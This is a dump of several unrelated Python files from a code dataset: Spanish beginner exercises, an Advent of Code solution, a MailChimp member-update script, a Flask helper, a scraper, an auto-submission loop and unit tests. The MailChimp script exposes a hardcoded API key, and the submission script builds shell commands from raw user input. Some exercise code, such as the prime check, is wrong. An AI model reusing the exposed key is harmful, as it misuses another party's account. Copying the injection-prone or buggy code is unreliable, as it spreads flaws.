par_impar('d')\n Traceback (most recent call last):\n ..\n TypeError: No es valido\n\n \"\"\"\n if str == type(num):\n raise TypeError('No es valido')\n elif num % 2 != 0:\n return 'Es impar'\n else:\n return 'Es par'\n\ndef mitad_doble(num1,num2):\n \"\"\"\n\n Entra un numero y se revisa si el primero es el doble del segundo\n\n Num -> Str\n\n :param num1: Numero a ser operado\n :param num2: Numero a ser revisado\n :return: Mensaje si uno es el doble del otro\n\n >>> mitad_doble(7,14)\n 'Si es el doble de un impar'\n >>> mitad_doble(7,15)\n 'No es el doble de un impar'\n >>> mitad_doble('hola',5)\n Traceback (most recent call last):\n 
..\n TypeError: No es valido\n >>> mitad_doble(4,'jl')\n Traceback (most recent call last):\n ..\n TypeError: No es valido\n\n \"\"\"\n if str == type(num1) or str == type(num2):\n raise TypeError('No es valido')\n elif num1 % 2 != 0 and num1*2 == num2:\n return 'Si es el doble de un impar'\n else:\n return 'No es el doble de un impar'\n\ndef cuadrado_primero(num1,num2):\n \"\"\"\n\n Entran dos numeros para verificar si es el cuadrado del primero, si es mayor o menos que la misma operacion\n\n num -> string\n\n :param num1: Primer numero\n :param num2: Segundo numero\n :return: Mensaje se verificacion\n\n >>> cuadrado_primero(2,4)\n 'Segundo cuadrado del primero'\n >>> cuadrado_primero(2,3)\n 'Segundo es menor al cuadrado del primero'\n >>> cuadrado_primero(2,5)\n 'Segundo es mayor al cuadrado del primero'\n >>> cuadrado_primero(-2,4)\n 'Segundo cuadrado del primero'\n >>> cuadrado_primero('q',3)\n Traceback (most recent call last):\n ..\n TypeError: No es valido\n >>> cuadrado_primero(3,'i')\n Traceback (most recent call last):\n ..\n TypeError: No es valido\n\n \"\"\"\n\n if str == type(num1) or str == type(num2):\n raise TypeError('No es valido')\n elif num1**2 == num2:\n return 'Segundo cuadrado del primero'\n elif num1**2 > num2:\n return 'Segundo es menor al cuadrado del primero'\n elif num1**2 < num2:\n return 'Segundo es mayor al cuadrado del primero'\n\ndef es_primo(num):\n \"\"\"\n\n Determina, a partir de un numero dado, si es primo o no\n\n :param num: Numero de entrada\n :return: Es primo o no\n\n >>> es_primo(8)\n 'No es primo'\n >>> es_primo(3)\n 'Es primo'\n >>> es_primo(1)\n Traceback (most recent call last):\n ..\n TypeError: No es valido\n >>> es_primo(9)\n Traceback (most recent call last):\n ..\n TypeError: No es valido\n\n \"\"\"\n\n if num < 2:\n raise TypeError('No es valido')\n elif num >= 9:\n raise TypeError('No es valido')\n elif num == 2:\n return 'Es primo'\n elif num >= 2 and num%num == 0 and num%1 == 0 and num%2 != 0:\n return 'Es primo'\n else:\n return 'No es primo'\n\ndef billetes_verdes(cant):\n \"\"\"\n\n Str -> num\n :param cant: valor de una cantidad en euros\n :return: los billetes\n\n >>> billetes_verdes('434')\n '2 billetes de 200 1 billete de 20 euros 1 billete de 10 euros 2 monedas de 2 euros'\n >>> billetes_verdes('626')\n '3 billetes de 200 1 billete de 20 euros 3 monedas de 2 euros'\n >>> billetes_verdes('1298')\n '6 billetes de 200 4 billete de 20 euros 1 billete de 10 euros 4 monedas de 2 euros'\n\n \"\"\"\n\n billetes_200 = int(cant) // 200\n new_1 = int(cant) % 200\n billetes_20 = new_1 // 20\n new_2 = new_1 % 20\n billetes_10 = new_2 // 10\n new_3 = new_2 % 10\n monedas_2 = new_3 // 2\n new_4 = new_3 % 2\n\n mensaje = ''\n\n if (billetes_200):\n mensaje += str(billetes_200) + ' billetes de 200 '\n\n if (billetes_20):\n mensaje += str(billetes_20) + ' billete de 20 euros '\n\n if (billetes_10):\n mensaje += str(billetes_10) + ' billete de 10 euros '\n\n if (monedas_2):\n mensaje += str(monedas_2) + ' monedas de 2 euros'\n\n return ('%s' % mensaje.rstrip('\\n'))","sub_path":"Semana_5/ejemplos_if_2.py","file_name":"ejemplos_if_2.py","file_ext":"py","file_size_in_byte":6761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"143819953","text":"import ast\n\n\ndef parse_line(char, start):\n coordinates = start # [x, y]\n if char == \">\":\n coordinates[0] += 1\n elif char == \"<\":\n coordinates[0] -= 1\n elif char == \"^\":\n coordinates[1] += 1\n elif char == \"v\":\n coordinates[1] -= 1\n 
else:\n raise Exception(\"Invalid character: \" + char)\n\n return coordinates\n\n\ndef solve(puzzle_input):\n visited1 = [[0, 0]]\n start1 = [0, 0]\n for char_index in range(0, len(puzzle_input), 2):\n char = puzzle_input[char_index]\n data = parse_line(char, start1)\n if data not in visited1:\n visited1.append(data[:])\n start1 = data\n\n visited2 = [[0, 0]]\n start2 = [0, 0]\n for char_index in range(1, len(puzzle_input), 2):\n char = puzzle_input[char_index]\n data = parse_line(char, start2)\n if data not in visited2:\n visited2.append(data[:])\n start2 = data\n\n # No need to do this anymore, as we list(set()) the list. visited2.remove([0, 0]) # [0, 0] is already in visited1\n visited = visited1 + visited2\n\n # Unhashable type 'list' bypass\n visited_string_list = []\n for i in visited:\n visited_string_list.append(str(i))\n visited_string_list = list(set(visited_string_list)) # Remove duplicates\n\n visited = []\n for i in visited_string_list:\n visited.append(ast.literal_eval(i))\n\n print(visited)\n total = len(visited)\n\n return total\n\n\ndef main():\n f = open(\"puzzle_input\")\n puzzle_input = f.read()\n f.close()\n\n solution = solve(puzzle_input)\n print(solution)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"2015/3/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"343603863","text":"import requests\nimport sys\nimport logging\nimport json\nimport hashlib\n\nlogging.basicConfig(level=logging.INFO)\nauth = \"a6416f0279b825c0c434ba0c5e043b0e-us14\"\nlog = logging.getLogger(\"Check:\")\nurl = \"https://us14.api.mailchimp.com/3.0\"\nauthorize = (\"Username\", \"a6416f0279b825c0c434ba0c5e043b0e-us14\")\n\n\ndef get_info():\n tester = requests.get(\"{}/lists/472f5e896c/members\".format(url), auth=authorize)\n log.info(tester.content)\n new_dict = tester.content\n return new_dict\n\n\ndef make_json(email, first, last, git):\n diction = {\n \"email_address\": email,\n \"status\": \"subscribed\",\n \"merge_fields\": {\n \"FNAME\": first,\n \"LNAME\": last,\n \"GITHUB\": git,\n \"ONBOARDED\": 1\n }\n }\n return diction\n\n\ndef mail_chimp():\n diction = json.loads(get_info())\n new = diction[\"members\"]\n for key in new:\n if key[\"merge_fields\"][\"ONBOARDED\"]:\n log.info(\"ONBOARDED\")\n fname = \"null\"\n lname = \"null\"\n git = \"null\"\n on = 1\n else:\n email = key[\"email_address\"]\n temp_hash = hashlib.md5(email.encode())\n email_hash = temp_hash.hexdigest()\n log.info(email_hash)\n fname = key[\"merge_fields\"][\"FNAME\"]\n lname = key[\"merge_fields\"][\"LNAME\"]\n git = key[\"merge_fields\"][\"GITHUB\"]\n on = key[\"merge_fields\"][\"ONBOARDED\"]\n stag = {\n \"FNAME\": fname,\n \"LNAME\": lname,\n \"GITHUB\": git,\n \"EMAIL\": email\n }\n info = make_json(email, fname, lname, git)\n req = requests.patch(\"{}/lists/472f5e896c/members/{}\".format(url, email_hash), data=json.dumps(info),\n auth=authorize)\n log.info(req.content)\n log.info(stag)\n return stag\n return 0\n\n\nif __name__ == \"__main__\":\n log.info(mail_chimp())\n get_info()\n","sub_path":"src/add_to_accounts/MailChimp.py","file_name":"MailChimp.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"363614191","text":"import os\nimport urllib.parse\nfrom flask import current_app\n\n\ndef get_template(template_name: str) -> str:\n \"\"\"\n Helper function to read the template 
from disk and return as a string to be manipulated\n :param template_name: The template we want to load\n :return: Template as a string\n \"\"\"\n try:\n template_location = os.path.join(os.path.dirname(__file__), 'templates/{0}'.format(template_name))\n with open(template_location, mode='r', encoding='utf-8') as template:\n return template.read()\n except FileNotFoundError:\n current_app.logger.error('Unable open file {0}'.format(template_location))\n raise ValueError('Unable open file {0}'.format(template_location))\n\n\ndef get_profile_url(username: str):\n \"\"\" Helper function returns the URL of the supplied users profile \"\"\"\n base_url = current_app.config['APP_BASE_URL']\n return f'{base_url}/user/{urllib.parse.quote(username)}'\n","sub_path":"server/services/messaging/template_service.py","file_name":"template_service.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"78952726","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_html(url):\n response = requests.get(url)\n return response.text\n\n\ndef get_data(html):\n soup = BeautifulSoup(html, 'lxml')\n header = soup.find('div', id='home-welcome').find('header')\n h1_text = header.find('h1').text\n p_text = header.find('p').text\n title = f'{h1_text}\\n{p_text}'\n return title\n\n\ndef main():\n url = 'https://wordpress.org/'\n print(get_data(get_html(url)))\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"course/simple_parser.py","file_name":"simple_parser.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"559177074","text":"import sys\nimport os\nimport threading\niterations = 10\ntimer = 5\nproblemID = ''\nmainId = ''\nfiles = ''\nrestart = False;\niteration_num = 0;\n\n\ndef parameters():\n global iterations\n global timer\n global problemID\n global files\n global mainId\n while True:\n try:\n # cast to int\n # if no value is entered catch the exception and use defualt values\n iterations = int(\n input('Enter number of iterations for submission (An integer, Default: 10):\\n'))\n if iterations <= 0 or iterations > 500:\n print('Must submit at least once and cannot submit more than 500 times');\n continue;\n print(\"# iterations: \", iterations, \"\\n\");\n break;\n except ValueError:\n # got something that could not be cast to a int. Interpret as user wanting default value.\n print(\"Default value used.\");\n iterations = 10;\n print(\"# iterations: \", iterations, \"\\n\");\n break;\n while True:\n try:\n if iterations == 1:\n print('timer value irrelevant for one submission\\n');\n break;\n\n # cast to int\n # if no value is entered catch the exception and use defualt values\n timer = int(input('Enter time interval before new submission (in minutes, Default: 5):\\n'));\n print(\"time (minutes): \", timer, \"\\n\");\n break;\n except ValueError:\n # got something that could not be cast to a int. 
Interpret as user wanting default value.\n print(\"Default value used.\");\n timer = 5;\n print(\"time (minutes): \", timer, \"\\n\");\n break;\n while True:\n try:\n # cast to string\n # value must be entered continue until any string, make sure it's a valid problem id.\n problemID = str(input('Enter unique problem id:\\n'))\n if problemID == '' :\n print('Unique problem id must be specified');\n continue;\n print(\"problem id: \", problemID, \"\\n\");\n break;\n except Exception:\n # Catch any exception\n print('An error occured');\n break;\n while True:\n try:\n # cast to string\n # user must choose main file\n mainId = str(input('Enter name of main file:\\n'))\n if mainId == '':\n print('Main file must be specified');\n continue;\n print('main file is: ', mainId, \"\\n\");\n break;\n except Exception:\n # Catch any exception\n print('An error occured');\n break;\n\ndef prepare_project_files():\n global files;\n print('Files that will be included in submission are:');\n split_files = os.listdir('./project_files');\n proj_files = \"./project_files/{0}\".format(split_files[0]);\n print(split_files[0]);\n for i in range (1, len(split_files)):\n temp = \" ./project_files/{0}\".format(split_files[i]);\n proj_files += temp;\n print(split_files[i]);\n files = proj_files;\n\n\ndef submit():\n global iterations;\n global iteration_num;\n if iterations == 0:\n print('Finished submitting...program closing');\n sys.exit(0);\n else:\n try:\n iterations -= 1;\n iteration_num += 1;\n print('Running iteration: ', iteration_num);\n submit_req = \"python ./submit.py {0} -p {1} -m {2}\".format(\n files, problemID, mainId);\n os.system(submit_req);\n if iterations == 0:\n print('Finished submitting...program closing');\n sys.exit(0);\n threading.Timer((timer * 60), submit).start();\n except Exception:\n raise Exception('An error occured during submission number: ', iteration_num);\n\ndef main():\n parameters();\n run = True;\n while run:\n try:\n start = str(input('Do you want to start automation? 
(Y/N), Default is yes.')).lower();\n if start == 'y' or start == '':\n prepare_project_files();\n submit();\n run = False;\n elif start == 'n':\n print('Program exited');\n run = False;\n sys.exit(0);\n except Exception as e:\n print(e);\n run = False;\n sys.exit(0);\n\nif __name__ == '__main__':\n main()\n","sub_path":"auto_submit.py","file_name":"auto_submit.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"651003039","text":"from http import HTTPStatus\nfrom unittest import mock\n\nfrom authlib.jose import jwt\nfrom pytest import fixture\n\nfrom .utils import headers\n\n\ndef routes():\n yield '/health'\n\n\n@fixture(scope='module', params=routes(), ids=lambda route: f'POST {route}')\ndef route(request):\n return request.param\n\n\ndef test_health_call_with_invalid_jwt_failure(route, client, invalid_jwt):\n response = client.post(route, headers=headers(invalid_jwt))\n\n expected_payload = {\n 'errors': [\n {\n 'code': 'authorization failed',\n 'message': ('Authorization failed: '\n 'Failed to decode JWT with provided key'),\n 'type': 'fatal',\n }\n ]\n }\n\n assert response.status_code == HTTPStatus.OK\n assert response.get_json() == expected_payload\n\n\ndef test_health_call_success(route, client, valid_jwt):\n app = client.application\n\n target = 'api.health.get_events_for_entity'\n\n # Nothing really matters...\n data = ...\n\n with mock.patch(target) as get_events_for_entity_mock:\n get_events_for_entity_mock.return_value = (data, None)\n\n response = client.post(route, headers=headers(valid_jwt))\n\n key = jwt.decode(valid_jwt, app.config['SECRET_KEY'])['key']\n entity = app.config['GTI_TEST_ENTITY']\n\n get_events_for_entity_mock.assert_called_with(key, entity)\n\n expected_payload = {'data': {'status': 'ok'}}\n\n assert response.status_code == HTTPStatus.OK\n assert response.get_json() == expected_payload\n\n\ndef test_health_call_with_auth_error_from_gti_failure(route,\n client,\n valid_jwt):\n app = client.application\n\n target = 'api.health.get_events_for_entity'\n\n error = {\n 'code': 'client.invalid_authentication',\n 'message': 'Authentication is invalid.',\n }\n\n with mock.patch(target) as get_events_for_entity_mock:\n get_events_for_entity_mock.return_value = (None, error)\n\n response = client.post(route, headers=headers(valid_jwt))\n\n key = jwt.decode(valid_jwt, app.config['SECRET_KEY'])['key']\n entity = app.config['GTI_TEST_ENTITY']\n\n get_events_for_entity_mock.assert_called_with(key, entity)\n\n expected_payload = {\n 'errors': [\n {\n 'code': 'client : invalid authentication',\n 'message': 'Authentication is invalid.',\n 'type': 'fatal',\n }\n ]\n }\n\n assert response.status_code == HTTPStatus.OK\n assert response.get_json() == expected_payload\n","sub_path":"tests/unit/api/test_health.py","file_name":"test_health.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"246995927","text":"def dodawanie(a,b):\n return a+b\ndef get_info():\n print('to jest prosty program kalkulator')\nget_info()\nprint('podaj pierwssza liczbe')\na=int(input())\nprint('podaj druga liczbe')\nb=int(input())\nprint(dodawanie (a,b))\n","sub_path":"kalkulator.py","file_name":"kalkulator.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"244182712","text":"from django.shortcuts import render, 
redirect\nfrom submit.models import ScoreModel, SubmitModel\n\n# Create your views here.\ndef leaderboard_base_view(request):\n\n    score_list = ScoreModel.objects.all().order_by('score_date')\n    date_list = score_list.values_list('score_date', flat=True).distinct()\n\n    context = {\n        'date_list':date_list,\n        'score_list':score_list\n    }\n\n    return render(request, 'leaderboard/leaderboard_list.html', context)","sub_path":"leaderboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"487811063","text":"from bs4 import BeautifulSoup\nimport requests\nimport os\n# fetch a web resource\ndef get(url):\n    try:\n        headers={\"user-agent\":\"Mozilla/5.0\"}\n        r=requests.get(url , timeout = 30 ,headers=headers)\n        r.raise_for_status()\n        r.encoding=r.apparent_encoding\n        return r\n    except Exception as e:\n        return \"something wrong\"\n# save the image to disk\ndef store_pic(response):\n    root = \"D://pic//\"\n    path = root + response.url.split(\"/\")[-1]\n    try:\n        if not os.path.exists(root):\n            os.mkdir(root)\n        if not os.path.exists(path):\n            with open(path,'wb') as f:\n                f.write(response.content)\n                f.close()\n                print(\"文件保存成功\")\n        else:\n            print(\"文件已经存在\")\n    except Exception as e:\n        print(\"文件保存失败\")\n\nheaders={\"user-agent\":\"Mozilla/5.0\"}\nr = requests.get(\"https://www.bilibili.com\",headers=headers)\nr.encoding = r.apparent_encoding\nsoup = BeautifulSoup(r.text,\"html.parser\")\nfor link in soup.find_all('img'):\n\t# check src before concatenating: \"http://\" + None would raise TypeError\n\tsrc = link.get('src')\n\tif src is None:\n\t\tcontinue\n\tstore_pic(get(\"http://\" + src))","sub_path":"beatufulsoup_test.py","file_name":"beatufulsoup_test.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"11374909","text":"from __future__ import absolute_import, print_function\n\nimport numpy as np\n\ndef parse_targets(y_label):\n    y_class = []\n    y_box = []\n    \n    for i in y_label:\n        i_list = i.split(' ')\n        y_class.append(int(i_list[0]))\n        y_box.append([float(j) for j in i_list[1:5]])\n    \n    return np.array(y_class), np.array(y_box)\n\ndef get_file_list(file_path):\n    with open(file_path, 'r') as f:\n        file_list = f.read().splitlines()\n    return file_list","sub_path":"utils_misc.py","file_name":"utils_misc.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"631763009","text":"\"\"\"\nThis module takes care of starting the API Server, Loading the DB and Adding the endpoints\n\"\"\"\nimport os\nfrom flask import Flask, request, jsonify, url_for\nfrom flask_migrate import Migrate\nfrom flask_swagger import swagger\nfrom flask_cors import CORS\nfrom utils import APIException, generate_sitemap\nfrom admin import setup_admin\nfrom models import db, User, Planet, Character\n#from models import Person\n\napp = Flask(__name__)\napp.url_map.strict_slashes = False\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DB_CONNECTION_STRING')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\nMIGRATE = Migrate(app, db)\ndb.init_app(app)\nCORS(app)\nsetup_admin(app)\n\n# Handle/serialize errors like a JSON object\n@app.errorhandler(APIException)\ndef handle_invalid_usage(error):\n    return jsonify(error.to_dict()), error.status_code\n\n# generate sitemap with all your endpoints\n@app.route('/')\ndef sitemap():\n    return generate_sitemap(app)\n\n@app.route('/user', methods=['GET'])\ndef handle_hello():\n\n    response_body = {\n
\"msg\": \"Hello, this is your GET /user response \"\n }\n\n return jsonify(response_body), 200\n\n@app.route('/create', methods=['GET'])\ndef create():\n user = User(username='Karina', email = 'prueba@example.com', password='1')\n planet = Planet (name='Earth')\n planet1 = Planet (name='Pluton')\n character1 = Character(name='Luke Skywalker')\n character2 = Character (name='Princess Leia')\n user.favorite_planets.append(planet)\n user.favorite_planets.append(planet1)\n user.favorite_characters.append(character1)\n user.favorite_characters.append(character2)\n\n db.session.add(user)\n db.session.commit()\n\n return jsonify([]), 200\n \n@app.route('/people', methods=['GET'])\ndef get_characters():\n characters = Character.query.all()\n characters = list(map (lambda character: character.serialize(), characters))\n return jsonify(characters), 200\n\n@app.route('/people/', methods=['GET'])\ndef get_character(people_id):\n character = Character.query.get(people_id)\n return jsonify(character.serialize()), 200\n\n@app.route('/planets', methods=['GET'])\ndef get_planets():\n planets = Planet.query.all()\n planets = list(map (lambda planet: planet.serialize(), planets))\n return jsonify(planets), 200\n\n@app.route('/planets/', methods=['GET'])\ndef get_planet(planet_id):\n planet = Planet.query.get(planet_id)\n return jsonify(planet.serialize()), 200\n\n@app.route('/users', methods=['GET'])\ndef get_users():\n users = User.query.all()\n users = list(map (lambda user: user.serialize(), users))\n return jsonify(users), 200\n\n@app.route('/users//favorites', methods=['GET'])\ndef get_user_favorites(user_id):\n user = User.query.get(user_id)\n favorites = []\n for character in user.favorite_characters:\n favorites.append(character.name)\n for planet in user.favorite_planets:\n favorites.append(planet.name)\n\n return jsonify(favorites), 200\n\n@app.route('/favorite/planet/', methods=['POST'])\ndef add_favorite_planet(planet_id):\n planet = Planet.query.get(planet_id)\n user = User.query.get(1)\n user.favorite_planets.append(planet_id)\n db.session.commit()\n return jsonify(planet.serialize()), 200\n\n@app.route('/favorite/people/', methods=['POST'])\ndef add_favorite_character(character_id):\n character = Character.query.get(character_id)\n user = User.query.get(1)\n user.favorite_characters.append(character_id)\n db.session.commit()\n return jsonify(character.serialize()), 200\n\n@app.route('/favorite/people/', methods=['DELETE'])\ndef delete_favorite_character(character_id):\n character = Character.query.get(character_id)\n user = User.query.get(1)\n character_position = user.favorite_characters.index(character)\n user.favorite_characters.pop(character_position)\n db.session.commit()\n return jsonify(character.serialize()), 200\n\n@app.route('/favorite/planets/', methods=['DELETE'])\ndef delete_favorite_planet(planet_id):\n planet = Planet.query.get(planet_id)\n user = User.query.get(1)\n planet_position = user.favorite_planets.index(planet)\n user.favorite_planets.pop(planet_position)\n db.session.commit()\n return jsonify(planet.serialize()), 200\n \n# this only runs if `$ python src/main.py` is executed\nif __name__ == '__main__':\n PORT = int(os.environ.get('PORT', 3000))\n app.run(host='0.0.0.0', port=PORT, debug=False)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"9034634","text":"import math\n\ndef isPrime(number):\n\tif number%3 == 
 0:\n\t\treturn False\n\tif number%2 == 0:\n\t\treturn False\n\telse:\n\t\tcheckRange = int(math.ceil(math.sqrt(number)))\n\t\ti = 6\n\t\tfinished = False\n\t\twhile finished == False:\n\t\t\tif number%(i-1) == 0:\n\t\t\t\treturn False\n\t\t\tif number%(i+1) == 0:\n\t\t\t\treturn False\n\t\t\t#\n\t\t\ti += 6\n\t\t\tif i > checkRange:\n\t\t\t\tfinished = True\n\t\treturn True\n\ndef numToList(num):\n\tstrA = str(num)\n\taList = [0]*len(strA)\n\t#\n\tfor i in range(1,len(strA)+1):\n\t\taList[i-1] = int(strA[i-1:i])\n\treturn aList\n\t\ndef listEqual(listA,listB):\n\tequal = True\n\tfor i in range(0,len(listA)):\n\t\tif(listA[i] != listB[i]):\n\t\t\tequal = False\n\treturn equal\n\t\ndef sameDigits(numA,numB,numC):\n\taList = numToList(numA)\n\tbList = numToList(numB)\n\tcList = numToList(numC)\n\t#Sort low to high\n\taList.sort()\n\tbList.sort()\n\tcList.sort()\n\t#\n\tif(listEqual(aList,bList) == True) and (listEqual(aList,cList)):\n\t\treturn True\n\telse:\n\t\treturn False\n\t\n#Pre-calculate all of the primes between 1000 to 9999\nprimes = [False]*10000\nprimesList = []\nfor i in range(1001,9999,2):\n\tif(isPrime(i) == True):\n\t\tprimes[i] = True\n\t\tprimesList.append(i)\n#\n\nfor i in range(0,len(primesList)-2):\n\tcurrentPrime = primesList[i]\n\tupperRange = float(9999 - primesList[i])\n\tupperRange = int(math.ceil(upperRange / 2.0))  # cast back to int: range() rejects floats in Python 3\n\tfor j in range(2,upperRange,2):\n\t\tif(primes[currentPrime+j] == True):\n\t\t\tif(currentPrime+2*j) <= 9999:\n\t\t\t\tif(primes[currentPrime+2*j] == True):\n\t\t\t\t\tif(sameDigits(currentPrime,currentPrime+j,currentPrime+2*j)):\n\t\t\t\t\t\tprint(\"Solution\")\n\t\t\t\t\t\tprint(currentPrime)\n\t\t\t\t\t\tprint(currentPrime+j)\n\t\t\t\t\t\tprint(currentPrime+2*j)","sub_path":"problem49.py","file_name":"problem49.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"402300495","text":"from selenium import webdriver\nfrom time import sleep\n\nlink = 'http://suninjuly.github.io/wait1.html'\nbrowser = webdriver.Chrome()\nbrowser.implicitly_wait(5)  # the browser will wait up to 5 seconds for each element to appear (load) and retry reaching it every 500 milliseconds\ntry:\n    browser.get(link)\n    submit_btn = browser.find_element_by_class_name('btn')\n    submit_btn.click()\n    check_element_text = browser.find_element_by_id('verify_message').text\n    print(check_element_text)\nfinally:\n    sleep(2)\n    browser.close()\n\n","sub_path":"2.4.5_implicit_waits.py","file_name":"2.4.5_implicit_waits.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"214625768","text":"def first_pal(word, left, right):\n    while left < right:\n        if (word[left] == word[right]):\n            left += 1\n            right -= 1\n        else:\n            del_left = second_pal(word, left+1, right)\n            del_right = second_pal(word, left, right-1)\n            if (del_left or del_right):\n                return 1\n            else:\n                return 2\n    return 0\n\ndef second_pal(word, left, right):\n    while left < right:\n        if (word[left] == word[right]):\n            left += 1\n            right -= 1\n        else:\n            return False\n    return True\n\n\n\nT = int(input())\nfor tc in range(1, T+1):\n    word = input()\n    left = 0\n    right = len(word) - 1\n    print(first_pal(word, left, right))\n\n\n# time limit exceeded (previous attempt)\n# def ispal(testword):\n#     for w in range(len(testword)):\n#         ispal = testword[0:w] + testword[w+1:]\n#         if ispal == ispal[::-1]:\n#             return 1\n#     return 2\n\n\n# T = int(input())\n# for tc in range(1, T+1):\n#     word = input()\n\n#     if word == 
word[::-1]:\n# print(0)\n\n# else:\n# print(ispal(word))","sub_path":"b17609.py","file_name":"b17609.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"559546342","text":"\"\"\"Unit tests for the Poincare ball.\"\"\"\n\nimport pytest\n\nimport geomstats.backend as gs\nfrom geomstats.geometry.hyperboloid import Hyperboloid\nfrom geomstats.geometry.poincare_ball import PoincareBall, PoincareBallMetric\nfrom tests.conftest import Parametrizer\nfrom tests.data.poincare_ball_data import (\n PoincareBallTestData,\n TestDataPoincareBallMetric,\n)\nfrom tests.geometry_test_cases import OpenSetTestCase, RiemannianMetricTestCase\n\n\nclass TestPoincareBall(OpenSetTestCase, metaclass=Parametrizer):\n space = PoincareBall\n skip_test_projection_belongs = True\n\n testing_data = PoincareBallTestData()\n\n def test_belongs(self, dim, point, expected):\n space = self.space(dim)\n result = space.belongs(gs.array(point))\n self.assertAllClose(result, gs.array(expected))\n\n def test_projection_norm_lessthan_1(self, dim, point):\n space = self.space(dim)\n projected_point = space.projection(gs.array(point))\n result = gs.sum(projected_point * projected_point) < 1.0\n self.assertTrue(result)\n\n\nclass TestPoincareBallMetric(RiemannianMetricTestCase, metaclass=Parametrizer):\n metric = connection = PoincareBallMetric\n skip_test_parallel_transport_ivp_is_isometry = True\n skip_test_parallel_transport_bvp_is_isometry = True\n skip_test_exp_geodesic_ivp = True\n skip_test_exp_belongs = True\n skip_test_geodesic_ivp_belongs = True\n\n testing_data = TestDataPoincareBallMetric()\n\n def test_mobius_out_of_the_ball(self, dim, x, y):\n metric = self.metric(dim)\n with pytest.raises(ValueError):\n metric.mobius_add(gs.array(x), gs.array(y), project_first=False)\n\n def test_log(self, dim, point, base_point, expected):\n metric = self.metric(dim)\n result = metric.log(gs.array(point), gs.array(base_point))\n self.assertAllClose(result, gs.array(expected))\n\n def test_dist_pairwise(self, dim, point, expected):\n metric = self.metric(dim)\n result = metric.dist_pairwise(gs.array(point))\n self.assertAllClose(result, gs.array(expected), rtol=1e-3)\n\n def test_dist(self, dim, point_a, point_b, expected):\n metric = self.metric(dim)\n result = metric.dist(gs.array(point_a), gs.array(point_b))\n self.assertAllClose(result, gs.array(expected))\n\n def test_coordinate(self, dim, point_a, point_b):\n metric = self.metric(dim)\n point_a_h = PoincareBall(dim).to_coordinates(gs.array(point_a), \"extrinsic\")\n point_b_h = PoincareBall(dim).to_coordinates(gs.array(point_b), \"extrinsic\")\n dist_in_ball = metric.dist(gs.array(point_a), gs.array(point_b))\n dist_in_hype = Hyperboloid(dim).metric.dist(point_a_h, point_b_h)\n self.assertAllClose(dist_in_ball, dist_in_hype)\n\n def test_mobius_vectorization(self, dim, point_a, point_b):\n metric = self.metric(dim)\n\n dist_a_b = metric.mobius_add(point_a, point_b)\n\n result_vect = dist_a_b\n result = [metric.mobius_add(point_a, point_b[i]) for i in range(len(point_b))]\n result = gs.stack(result, axis=0)\n self.assertAllClose(result_vect, result)\n\n dist_a_b = metric.mobius_add(point_b, point_a)\n\n result_vect = dist_a_b\n result = [metric.mobius_add(point_b[i], point_a) for i in range(len(point_b))]\n result = gs.stack(result, axis=0)\n self.assertAllClose(result_vect, result)\n\n def test_log_vectorization(self, dim, point_a, point_b):\n\n metric = self.metric(dim)\n dist_a_b = 
metric.log(point_a, point_b)\n\n result_vect = dist_a_b\n result = [metric.log(point_a, point_b[i]) for i in range(len(point_b))]\n result = gs.stack(result, axis=0)\n self.assertAllClose(result_vect, result)\n\n dist_a_b = metric.log(point_b, point_a)\n\n result_vect = dist_a_b\n result = [metric.log(point_b[i], point_a) for i in range(len(point_b))]\n result = gs.stack(result, axis=0)\n self.assertAllClose(result_vect, result)\n\n def test_exp_vectorization(self, dim, point_a, point_b):\n\n metric = self.metric(dim)\n dist_a_b = metric.exp(point_a, point_b)\n\n result_vect = dist_a_b\n result = [metric.exp(point_a, point_b[i]) for i in range(len(point_b))]\n result = gs.stack(result, axis=0)\n self.assertAllClose(result_vect, result)\n\n dist_a_b = metric.exp(point_b, point_a)\n\n result_vect = dist_a_b\n result = [metric.exp(point_b[i], point_a) for i in range(len(point_b))]\n result = gs.stack(result, axis=0)\n self.assertAllClose(result_vect, result)\n","sub_path":"tests/tests_geomstats/test_poincare_ball.py","file_name":"test_poincare_ball.py","file_ext":"py","file_size_in_byte":4600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} 